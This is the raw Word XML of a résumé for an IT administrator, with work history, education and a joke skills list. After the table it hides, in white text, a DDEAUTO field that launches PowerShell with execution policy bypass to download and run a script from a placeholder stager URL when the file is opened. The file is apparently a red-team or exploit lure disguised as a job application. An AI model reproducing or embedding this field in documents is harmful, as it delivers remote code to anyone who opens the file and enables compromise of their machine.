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31" w:rsidRPr="00A910E3" w:rsidRDefault="00721785" w:rsidP="00A910E3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151130</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="621030" cy="603250"/>
            <wp:effectExtent l="0" t="0" r="762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rle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594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171575" cy="1403985"/>
                <wp:effectExtent l="0" t="0" r="0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94" w:rsidRDefault="0006059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Update Objects to show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.05pt;margin-top:12.75pt;width:92.25pt;height:110.5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" filled="f" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00060594" w:rsidRDefault="0006059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Update Objects to show photo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6645">
        <w:t>Shirley Constantin</w:t>
      </w:r>
      <w:r w:rsidR="00937C83">
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721E31" w:rsidRDefault="00A910E3" w:rsidP="00A910E3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>4400 W. Monroe St., Chicago IL, 60624</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A910E3" w:rsidRDefault="00A910E3" w:rsidP="00A910E3">
      <w:pPr>
        <w:jc w:val="center"/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740D6" w:rsidTr="00DE1EAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E740D6" w:rsidRDefault="00E740D6" w:rsidP="00E740D6">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>PROFESSIONAL EXPERIENCE</w:t>
            </w:r>
          </w:p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Default="00AC243D" w:rsidP="00AC243D"/>
          <w:p w:rsidR="00AC243D" w:rsidRPr="00AC243D" w:rsidRDefault="00AC243D" w:rsidP="00AC243D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E740D6" w:rsidRDefault="004D114A" w:rsidP="00E740D6">
            <w:r>
              <w:t>Shire Pharmaceuticals</w:t>
            </w:r>
            <w:r w:rsidR="00E740D6">
              <w:t>– IT Administration</w:t>
            </w:r>
            <w:r w:rsidR="00DE1EAA">
              <w:t xml:space="preserve"> (7/2014-present)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E740D6" w:rsidRDefault="004D114A" w:rsidP="00E740D6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Supervised roll-out of Jenkins testing infrastructure</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D114A" w:rsidRDefault="004D114A" w:rsidP="004D114A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Integrated SAP installation with existing WebLogic Business Intelligence applications</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D114A" w:rsidRDefault="004D114A" w:rsidP="004D114A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Centralized sales reporting in an SAP application</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D114A" w:rsidRDefault="004D114A" w:rsidP="004D114A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Championed red-team security reports to aid security posture</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D114A" w:rsidRDefault="004D114A" w:rsidP="004D114A">
            <w:r>
              <w:t xml:space="preserve"> American Airways – IT Administration</w:t>
            </w:r>
            <w:r w:rsidR="00DE1EAA">
              <w:t xml:space="preserve"> (6/2012 – 5/2014)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D114A" w:rsidRDefault="00E45BED" w:rsidP="00E45BED">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Support for Business Intelligence tasks</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E45BED" w:rsidRDefault="00E45BED" w:rsidP="00E45BED">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Extensive on-call support for business-critical server</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E45BED" w:rsidRDefault="00E45BED" w:rsidP="00E45BED">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Deployed and observed IDS sensors, escalated incidents accordingly</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E45BED" w:rsidRDefault="00E45BED" w:rsidP="00E45BED">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Consolidated, refined, and improved existing documentation systems, leading to $100,000 in manual labor savings </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE1EAA" w:rsidRDefault="00DE1EAA" w:rsidP="00DE1EAA">
            <w:r>
              <w:t>Student IT Specialist - University Illinois Urbana-Champaign (8/2010-5/2012)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE1EAA" w:rsidRDefault="00DE1EAA" w:rsidP="00DE1EAA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Deployed and managed HIPS software on Administration systems</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE1EAA" w:rsidRDefault="00DE1EAA" w:rsidP="00DE1EAA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conducted penetration tests of Administration systems with Core Impact and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Metasploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E740D6" w:rsidTr="00DE1EAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E740D6" w:rsidRDefault="00E740D6" w:rsidP="00E740D6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4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E740D6" w:rsidRDefault="004D114A" w:rsidP="004D114A">
            <w:r>
              <w:t>University Illinois Urbana-Champaign</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D114A" w:rsidRDefault="004D114A" w:rsidP="004D114A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Masters in Management Information Systems (Spring 2012)</w:t>
            </w:r>
            <w:r w:rsidR="00E45BED">
              <w:t xml:space="preserve"> – GPA: 3.7/4.0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D114A" w:rsidRDefault="004D114A" w:rsidP="004D114A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Bachelor of Science in Information Systems (Spring 2011)</w:t>
            </w:r>
            <w:r w:rsidR="00E45BED">
              <w:t xml:space="preserve"> – GPA: 3.9/4.0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E45BED" w:rsidRDefault="00E45BED" w:rsidP="004D114A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Minor in Visual Arts – Specialization in Postcolonial Structural Representations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E740D6" w:rsidTr="00DE1EAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E740D6" w:rsidRDefault="00E740D6" w:rsidP="00E740D6">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>ADDITIONAL SKILLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E45BED" w:rsidRDefault="00DE1EAA" w:rsidP="00E45BED">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Chastity belt construction</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E45BED" w:rsidRDefault="004D114A" w:rsidP="00E45BED">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Art projects </w:t>
            </w:r>
            <w:r w:rsidR="00E45BED">
              <w:t xml:space="preserve">asking the question: “are </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00E45BED">
              <w:t>mannequins</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00E45BED">
              <w:t xml:space="preserve"> people?”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E45BED" w:rsidRDefault="00E45BED" w:rsidP="00E45BED">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Naked rumba dancing</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E45BED" w:rsidRDefault="00E45BED" w:rsidP="00E45BED">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Home-brewed Cannabis beer </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E740D6" w:rsidTr="00DE1EAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E740D6" w:rsidRDefault="00E740D6"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E740D6" w:rsidRDefault="00E740D6"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E740D6" w:rsidTr="00DE1EAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E740D6" w:rsidRDefault="00E740D6"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E740D6" w:rsidRDefault="00E740D6"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00834221" w:rsidRDefault="00834221"/>
    <w:p w:rsidR="00834221" w:rsidRPr="00DB4489" w:rsidRDefault="00834221">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB4489">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DB4489">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> DDE</w:instrText>
      </w:r>
      <w:r w:rsidR="00006E49" w:rsidRPr="00DB4489">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText>AUTO</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DB4489">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "C:\\Windows\\System32\\Accessories\\wordpad.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -executionpolicy bypass iex (new-object net.webclient).downloadstring('EXPLOIT_STAGER_URL') #" "form.rtf" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DB4489">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00DB4489">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB4489">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00834221" w:rsidRPr="00DB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3BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B94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E77"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D28C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55DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="760E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2E4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6ECE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1"/>
    <w:rsid w:val="00006E49"/>
    <w:rsid w:val="00060594"/>
    <w:rsid w:val="00395FFC"/>
    <w:rsid w:val="004D114A"/>
    <w:rsid w:val="00566645"/>
    <w:rsid w:val="0071559A"/>
    <w:rsid w:val="00721785"/>
    <w:rsid w:val="00721E31"/>
    <w:rsid w:val="00774E8E"/>
    <w:rsid w:val="00834221"/>
    <w:rsid w:val="008E03B2"/>
    <w:rsid w:val="00937C83"/>
    <w:rsid w:val="00A910E3"/>
    <w:rsid w:val="00A92C94"/>
    <w:rsid w:val="00AC243D"/>
    <w:rsid w:val="00DB4489"/>
    <w:rsid w:val="00DE1EAA"/>
    <w:rsid w:val="00E45BED"/>
    <w:rsid w:val="00E740D6"/>
    <w:rsid w:val="00E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D191C-50F2-406B-A9EC-843D3DF8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E03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innuendo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>baremetal</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-30T17:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-06T21:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>